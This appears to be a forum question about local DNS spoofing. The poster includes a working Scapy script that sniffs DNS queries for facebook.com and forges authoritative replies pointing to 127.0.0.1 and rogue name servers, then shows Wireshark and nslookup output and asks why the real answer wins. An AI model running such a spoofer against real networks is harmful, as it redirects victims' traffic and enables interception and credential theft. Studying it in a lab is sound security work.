# DNS Packet Spoof Scapy

Tags: dns-spoofing

I am looking into local DNS spoofing by sniffing DNS-requests with Scapy, and sending a spoofed packet in response.

Here is the code I used:

```
from scapy.all import *
def spoof_dns(pkt):
    if (DNS in pkt and b'facebook.com' in pkt[DNS].qd.qname):
        IPpkt = IP(dst=pkt[IP].src, src=pkt[IP].dst)

        UDPpkt = UDP(dport=pkt[UDP].sport, sport=53)

        Anssec = DNSRR(rrname=pkt[DNS].qd.qname, type='A', ttl=259200, rdata='127.0.0.1')

        NSsec1 = DNSRR(rrname='facebook.com', type='NS', ttl=259200, rdata='ns1.facebook.com')
        NSsec2 = DNSRR(rrname='facebook.com', type='NS', ttl=259200, rdata='ns2.facebook.com')

        Addsec1 = DNSRR(rrname='ns1.facebook.com', type='A', ttl=259200, rdata='1.3.3.7')
        Addsec2 = DNSRR(rrname='ns2.facebook.com', type='A', ttl=259200, rdata='7.3.3.1')

        DNSpkt = DNS(id=pkt[DNS].id, qd=pkt[DNS].qd, aa=1, rd=0, qr=1,qdcount=1, ancount=1, nscount=2, arcount=2, an=Anssec, ns=NSsec1/NSsec2, ar=Addsec1/Addsec2)

        spoofpkt = IPpkt/UDPpkt/DNSpkt
        send(spoofpkt)

pkt = sniff(filter='udp and dst port 53', prn=spoof_dns)
```

Wireshark shows me the following:

```
> Standard Query 0x0007 A facebook.com
< Standard query Response 0x0007 A facebook.com A 127.0.0.1 NS ns1.facebook.com NS ns2.facebook.com A 1.3.3.7 A 7.3.3.1 (==> My spoofed response)
< Standard query response 0x0007 A facebook.com A 179.60.195.36 (==> The actual response, after mine).
```

This is the result of running `nslookup` like this:

```
> set type=A
> facebook.com
Server:  dns.google
Address:  8.8.8.8

Non-authoritative answer:
Name:    facebook.com
Address:  179.60.195.36
```

How come `nslookup` reports `179.60.195.36` as the A record, allthough we can clearly see in wireshark that my spoofed packet comes back first?

Wireshark also marks the second (official) packet as a "UDP Retransmission". Are retransmissions given priority over the original?